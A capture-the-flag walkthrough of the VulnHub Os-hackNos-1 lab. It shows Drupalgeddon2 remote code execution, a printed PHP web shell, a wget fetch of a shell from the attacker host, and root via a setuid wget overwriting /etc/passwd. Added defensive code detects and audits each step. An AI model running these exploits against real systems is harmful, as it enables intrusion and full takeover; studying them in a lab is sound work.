[VulnHub] Os-hackNos-1 walkthrough

Lab environment:
Target: 192.168.0.10
Attacker (Kali): 192.168.0.11

I. Information gathering

1. A quick masscan port sweep shows ports 22 and 80 open.

root@kali:~# masscan -p0-65535 --rate=2000 192.168.0.10

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-15 11:31:19 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.0.10                                    
Discovered open port 80/tcp on 192.168.0.10   

2. nmap probes the service versions and known issues on ports 22 and 80.

root@kali:~# nmap -sC -sV -p22,80 192.168.0.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 06:34 EST
Nmap scan report for 192.168.0.10
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a5:a5:17:70:4d:be:48:ad:ba:64:c1:07:a0:55:03:ea (RSA)
|   256 f2:ce:42:1c:04:b8:99:53:95:42:ab:89:22:66:9e:db (ECDSA)
|_  256 4a:7d:15:65:83:af:82:a3:12:02:21:1c:23:49:fb:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:EA:58:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3. Start with port 80: a dirb directory scan finds drupal.

root@kali:~# dirb http://192.168.0.10

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb 15 06:35:33 2020
URL_BASE: http://192.168.0.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.0.10/ ----
==> DIRECTORY: http://192.168.0.10/drupal/                                                           
+ http://192.168.0.10/index.html (CODE:200|SIZE:11321)                                               
+ http://192.168.0.10/server-status (CODE:403|SIZE:277)                                              
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/ ----
==> DIRECTORY: http://192.168.0.10/drupal/includes/                                                  
+ http://192.168.0.10/drupal/index.php (CODE:200|SIZE:7647)                                          
==> DIRECTORY: http://192.168.0.10/drupal/misc/                                                      
==> DIRECTORY: http://192.168.0.10/drupal/modules/                                                   
==> DIRECTORY: http://192.168.0.10/drupal/profiles/                                                  
+ http://192.168.0.10/drupal/robots.txt (CODE:200|SIZE:2189)                                         
==> DIRECTORY: http://192.168.0.10/drupal/scripts/                                                   
==> DIRECTORY: http://192.168.0.10/drupal/sites/                                                     
==> DIRECTORY: http://192.168.0.10/drupal/themes/                                                    
+ http://192.168.0.10/drupal/web.config (CODE:200|SIZE:2200)                                         
+ http://192.168.0.10/drupal/xmlrpc.php (CODE:200|SIZE:42)                                           
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                     
---- Entering directory: http://192.168.0.10/drupal/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------

4. whatweb reports version information and roughly identifies Drupal 7.

root@kali:~# whatweb http://192.168.0.10/drupal/
http://192.168.0.10/drupal/ [200 OK] Apache[2.4.18], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.0.10], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], Script[text/javascript], Title[Welcome to james | james], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN]

5. gobuster scans for txt files under the root / and under /drupal. This yields two informative files, /alexander.txt and /drupal/CHANGELOG.txt. CHANGELOG.txt pins the Drupal version to 7.57.

root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10 -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.10
[+] Threads:        100
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/02/15 06:46:33 Starting gobuster
===============================================================
/drupal (Status: 301)
/alexander.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/02/15 06:47:31 Finished
===============================================================
root@kali:~# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.0.10/drupal/ -t 100 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.10/drupal/
[+] Threads:        100
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/02/15 06:47:40 Starting gobuster
===============================================================
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/includes (Status: 301)
/sites (Status: 301)
/profiles (Status: 301)
/README.txt (Status: 200)
/robots.txt (Status: 200)
/INSTALL.txt (Status: 200)
/LICENSE.txt (Status: 200)
/CHANGELOG.txt (Status: 200)
/COPYRIGHT.txt (Status: 200)
/UPGRADE.txt (Status: 200)
===============================================================
2020/02/15 06:48:42 Finished
===============================================================
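The version check that step 5 does by eye, as an added example that is not part of the original writeup: it reads the newest release named in a Drupal CHANGELOG.txt and decides whether that release predates the Drupalgeddon2 fix. The fixed releases it compares against (7.58, 8.3.9, 8.4.6, 8.5.1) are the ones quoted from the exploit-db title later on this page; SAMPLE_CHANGELOG is constructed to mirror the Drupal 7 changelog layout, and the handling of 8.x branches outside that list is an assumption noted in the code.

```python
"""Added example: derive the Drupal version from CHANGELOG.txt and decide
whether it is older than the first release carrying the Drupalgeddon2 fix."""
import re
from typing import Optional, Tuple

Version = Tuple[int, ...]

# First release on each branch that carries the fix (from the exploit-db title:
# Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1).
FIXED_VERSIONS = {
    (7,): (7, 58),
    (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6),
    (8, 5): (8, 5, 1),
}

# Drupal 7 changelogs start with e.g. "Drupal 7.57, 2018-02-21"; the newest
# release is listed first, so the first match is the installed version.
VERSION_RE = re.compile(r"^Drupal\s+(\d+(?:\.\d+)+)", re.MULTILINE)

# Constructed sample in the layout of a Drupal 7 CHANGELOG.txt.
SAMPLE_CHANGELOG = """\
Drupal 7.57, 2018-02-21
-----------------------
- Fixed security issues (multiple vulnerabilities). See SA-CORE-2018-001.

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues.
"""


def parse_changelog_version(text: str) -> Optional[Version]:
    """Return the newest version named in the changelog, e.g. (7, 57)."""
    match = VERSION_RE.search(text)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def vulnerable_to_drupalgeddon2(version: Version) -> Optional[bool]:
    """True if `version` is older than the fixed release for its branch.

    Returns None for major versions the page does not list (Drupal 6 and
    earlier) rather than guessing."""
    if version[0] == 7:
        return version < FIXED_VERSIONS[(7,)]
    if version[0] == 8:
        branch = version[:2]
        if branch in FIXED_VERSIONS:
            return version < FIXED_VERSIONS[branch]
        # Assumption: 8.0-8.2 were end-of-life and never received the fix;
        # 8.6 and later were released after it.
        return branch < (8, 3)
    return None


def assess_changelog(text: str) -> dict:
    """Version string plus verdict, for use in an asset inventory."""
    version = parse_changelog_version(text)
    if version is None:
        return {"version": None, "vulnerable": None}
    return {
        "version": ".".join(map(str, version)),
        "vulnerable": vulnerable_to_drupalgeddon2(version),
    }


if __name__ == "__main__":
    print(assess_changelog(SAMPLE_CHANGELOG))  # {'version': '7.57', 'vulnerable': True}
```

The same file that makes this check easy for an administrator makes it easy for the scanner in step 5; a Drupal site should not serve CHANGELOG.txt (or the other .txt files gobuster found) to the public, and the version should be tracked from the inventory rather than from the web root.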

II. Getting a shell

1. Use the msf module exploit/unix/webapp/drupal_drupalgeddon2. When setting options, note that TARGETURI defaults to / and must be changed to the Drupal install directory, here /drupal. After run you get an msf shell.
2. Getting a shell manually: on exploit-db, find the entry dated 2018-04-13, "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution" (WebApps, PHP, Hans Topo & g0tmi1k). Run it as instructed to get a shell; afterwards a reverse shell can be obtained with python. Note that a bash reverse shell errors out here.

root@kali:~# gem install highline	# install the Ruby dependency highline
root@kali:~# git clone https://github.com/dreadlocked/Drupalgeddon2.git
root@kali:~/Drupalgeddon2# ls
drupalgeddon2-customizable-beta.rb  drupalgeddon2.rb  README.md
root@kali:~/Drupalgeddon2# ./drupalgeddon2.rb http://192.168.0.10/drupal/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.0.10/drupal/
--------------------------------------------------------------------------------
[+] Found  : http://192.168.0.10/drupal/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.57
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo SEFWERIV
[+] Result : SEFWERIV
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://192.168.0.10/drupal/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://192.168.0.10/drupal/shell.php' -d 'c=hostname'
hackNos>> 

3. Search GitHub for a Python exploit for Drupal 7.57. The -c parameter runs a command; wget can be used to pull over a web shell and get a reverse shell.

root@kali:~# git clone https://github.com/pimps/CVE-2018-7600.git
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "whoami"
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-y-Nt9_xZdA7YysBlakHYAmSIgsMMYKL2A4sB2nfMTdE
[*] Triggering exploit to execute: whoami
www-data
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py http://192.168.0.10/drupal/ -c "wget http://192.168.0.11/phpshell.txt -O phpshell.php"
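Detection logic for the web-facing traces this section leaves behind, as an added example that is not part of the original writeup. It parses Apache access-log lines and flags two things: requests for CHANGELOG.txt (the version fingerprinting both exploits perform) and parameter names that begin with '#' after URL decoding. Drupal's fix for CVE-2018-7600 (SA-CORE-2018-002) strips such keys from request input, so their presence in a log is the signal for this class of request. The log lines are constructed, and '#example_key' is a placeholder, not the exploit's real key.

```python
"""Added example: flag Drupal fingerprinting and '#'-prefixed request keys
in Apache access-log lines (constructed sample data)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache common/combined log prefix: client, identd, user, time, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed log lines; the '#example_key' parameter is a placeholder.
SAMPLE_LOG = [
    '192.168.0.11 - - [15/Feb/2020:06:47:31 -0500] "GET /drupal/CHANGELOG.txt HTTP/1.1" 200 109151',
    '192.168.0.20 - - [15/Feb/2020:07:01:10 -0500] "GET /drupal/index.php HTTP/1.1" 200 7647',
    '192.168.0.11 - - [15/Feb/2020:07:03:44 -0500] "POST /drupal/?q=user/password&name%5B%23example_key%5D%5B%5D=demo HTTP/1.1" 200 5',
    'garbage line that does not parse',
]


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into fields; the query string becomes a list of
    decoded parameter names (parse_qsl percent-decodes them)."""
    match = LOG_RE.match(line)
    if match is None:
        return None
    rec = match.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = unquote(url.path)
    rec["params"] = [key for key, _ in parse_qsl(url.query, keep_blank_values=True)]
    return rec


def findings_for(rec: dict) -> List[str]:
    """Human-readable reasons a parsed request is suspicious (empty if none)."""
    reasons = []
    if rec["path"].lower().endswith("/changelog.txt"):
        reasons.append("version fingerprinting: CHANGELOG.txt requested")
    # Keys such as name[#something] are what the SA-CORE-2018-002 sanitizer removes.
    render_keys = [k for k in rec["params"] if k.startswith("#") or "[#" in k]
    if render_keys:
        reasons.append("'#'-prefixed key in request input: " + ", ".join(render_keys))
    return reasons


def scan_log(lines) -> List[Tuple[str, str, List[str]]]:
    """(client ip, request target, reasons) for every line that matches a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not an access-log line
        reasons = findings_for(rec)
        if reasons:
            hits.append((rec["ip"], rec["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(reasons))
```

Apache logs the query string but not POST bodies, so this only sees the query-string form of the request; the Drupal 8 variant carries the keys in the body and needs a WAF or mod_security audit log instead. Either way the detection is a stop-gap; the fix is upgrading past the versions listed in step 2.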

III. Privilege escalation

1. LinEnum.sh lists wget under "Possibly interesting SUID files".

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hackNos:/$ 
www-data@hackNos:/tmp$ git clone https://github.com/rebootuser/LinEnum.git
www-data@hackNos:/tmp/LinEnum$ ./LinEnum.sh
[-] SUID files:
-rwsr-xr-x 1 root root 159852 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 34680 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 36288 May 17  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 506200 May  9  2018 /usr/bin/wget
-rwsr-xr-x 1 root root 53128 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39560 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48264 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 26492 May 16  2018 /bin/umount
-rwsr-xr-x 1 root root 157424 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 34812 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 38900 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12  2016 /bin/fusermount


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 506200 May  9  2018 /usr/bin/wget

Download the target's /etc/passwd to the Kali machine, then generate a password hash with openssl.

root@kali:~# openssl passwd -1 -salt suijishu 123456
$1$suijishu$pCi13H6xgVMoQBkitx4rg/
root@kali:~# echo 'hack:$1$suijishu$pCi13H6xgVMoQBkitx4rg/:0:0:root:/root:/bin/bash' >> passwd

Run wget on the target to overwrite its /etc/passwd, then su to hack: privilege escalation succeeds.

www-data@hackNos:/tmp$ wget http://192.168.0.11/passwd -O /etc/passwd
/etc/passwd         100%[===================>]   1.65K  --.-KB/s    in 0.002s  
2020-02-15 18:48:32 (764 KB/s) - '/etc/passwd' saved [1685/1685]
www-data@hackNos:/tmp$ su - hack
su - hack
Password: 123456
root@hackNos:~# 
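An audit of /etc/passwd for the entry the step above appends, as an added example that is not part of the original writeup. Per account it checks for a second UID 0 besides root, a password hash stored in the second field instead of 'x' (that is, not in /etc/shadow), an empty password field, and a non-root account whose home is /root. SAMPLE_PASSWD is constructed; its last line is the 'hack' entry from the page.

```python
"""Added example: flag root-equivalent or malformed accounts in passwd(5) data."""
from typing import List, Tuple

# Constructed sample; the final line is the entry appended on the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
james:x:1000:1000:james,,,:/home/james:/bin/bash
hack:$1$suijishu$pCi13H6xgVMoQBkitx4rg/:0:0:root:/root:/bin/bash
"""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[dict]:
    """Parse passwd(5) lines into dicts; lines without 7 fields are marked malformed."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        parts = line.split(":")
        entry = {"line": lineno, "raw": line, "malformed": len(parts) != 7}
        if not entry["malformed"]:
            entry.update(zip(FIELDS, parts))
        entries.append(entry)
    return entries


def audit_passwd(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, account name, reason) for every suspicious entry."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], e["raw"], "malformed entry (expected 7 colon-separated fields)"))
            continue
        name, pw, uid, home = e["name"], e["pw"], e["uid"], e["home"]
        if not uid.isdigit():
            findings.append((e["line"], name, "non-numeric UID"))
        elif int(uid) == 0 and name != "root":
            findings.append((e["line"], name, "additional UID 0 (root-equivalent) account"))
        if pw == "":
            findings.append((e["line"], name, "empty password field: login without a password"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # 'x' means the hash lives in /etc/shadow; '*' and '!...' are locked.
            findings.append((e["line"], name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if home == "/root" and name != "root":
            findings.append((e["line"], name, "home directory is /root"))
    return findings


if __name__ == "__main__":
    for line, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {name}: {reason}")
```

On a live host, run this against /etc/passwd and also diff the file against a known-good copy; the overwrite in this step changes the file's size and mtime as well, which a file-integrity monitor such as AIDE reports on its own. The root cause is the setuid bit on wget, which the next section's SUID listing surfaces.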

IV. Extras

1. About alexander.txt: decode it with echo | base64 -d, then decode the result again on an online decoder to get james:Hacker@4514. Testing shows these credentials cannot be used to log in.

root@hackNos:/var/www/html# cat alexander.txt
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==

root@hackNos:/var/www/html# echo 'KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==' | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+++.

2. Quickly standing up a web server on the Kali attacker with python:

root@kali:~# python -m SimpleHTTPServer 80 &
[2] 4963
[1]   Killed                  python -m SimpleHTTPServer 80
root@kali:~# Serving HTTP on 0.0.0.0 port 80 ...
192.168.0.22 - - [15/Feb/2020 08:34:22] "GET / HTTP/1.1" 200 -
192.168.0.22 - - [15/Feb/2020 08:34:31] "GET /shell.txt HTTP/1.1" 200 -

3. Two find commands for locating SUID files:

www-data@hackNos:/tmp$ find / -user root -perm -4000 -print 2>/dev/null	# -perm -4000: every file whose mode includes the 4000 (setuid) bit
www-data@hackNos:/tmp$ find / -perm -u=s -type f 2>/dev/null	# -u=s: every regular file that satisfies the u=s (setuid) condition
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/pkexec
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/wget
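The SUID listing from section III and the two find commands above both turn up /usr/bin/wget; what makes it stand out is that it is not supposed to be setuid on an Ubuntu install. This added example (not part of the original writeup) does the same enumeration in Python with os.lstat and then diffs the result against a per-host baseline, so an unexpected setuid-root binary, or a baseline binary that has lost its setuid bit, is reported. BASELINE and SAMPLE_SCAN are constructed from the LinEnum output on this page; a real baseline would be recorded from a freshly built host of the same image.

```python
"""Added example: enumerate setuid-root files and diff them against a baseline."""
import os
import stat
from typing import Iterable, List, Tuple

# Assumption: setuid-root files expected on this build, recorded at provisioning time
# (the LinEnum list from the page minus wget).
BASELINE = frozenset({
    "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/newuidmap", "/usr/bin/passwd",
    "/usr/bin/chsh", "/usr/bin/chfn", "/bin/ping6", "/bin/umount", "/bin/ntfs-3g",
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/fusermount",
})

# Constructed: the paths LinEnum listed under "[-] SUID files" on this box.
SAMPLE_SCAN = sorted(BASELINE | {"/usr/bin/wget"})

# Not descended into when scanning from "/": no real binaries live there.
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def scan_suid(root: str = "/", owner_uid: int = 0) -> List[str]:
    """Regular files under `root` with the setuid bit and the given owner,
    equivalent to `find / -user root -perm -4000 -type f`. Symlinks are not followed."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        if root == "/" and any(dirpath == p or dirpath.startswith(p + "/") for p in PSEUDO_FS):
            dirnames[:] = []  # prune pseudo-filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable, or vanished between listing and stat
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == owner_uid:
                found.append(path)
    return sorted(found)


def classify(found: Iterable[str], baseline=BASELINE) -> Tuple[List[str], List[str]]:
    """Return (unexpected, missing): setuid files absent from the baseline, and
    baseline entries that are no longer setuid (replaced or removed binaries)."""
    found_set = set(found)
    return sorted(found_set - baseline), sorted(baseline - found_set)


if __name__ == "__main__":
    unexpected, missing = classify(SAMPLE_SCAN)
    print("unexpected setuid-root files:", unexpected)  # ['/usr/bin/wget']
    print("baseline entries missing:", missing)         # []
```

Run as root so that every directory is readable, and keep the baseline out of band (a configuration-management check or a file-integrity monitor), since a host that has already been tampered with cannot vouch for its own list. The remediation for this box is simply `chmod u-s /usr/bin/wget`, which the package manager would also restore on reinstall.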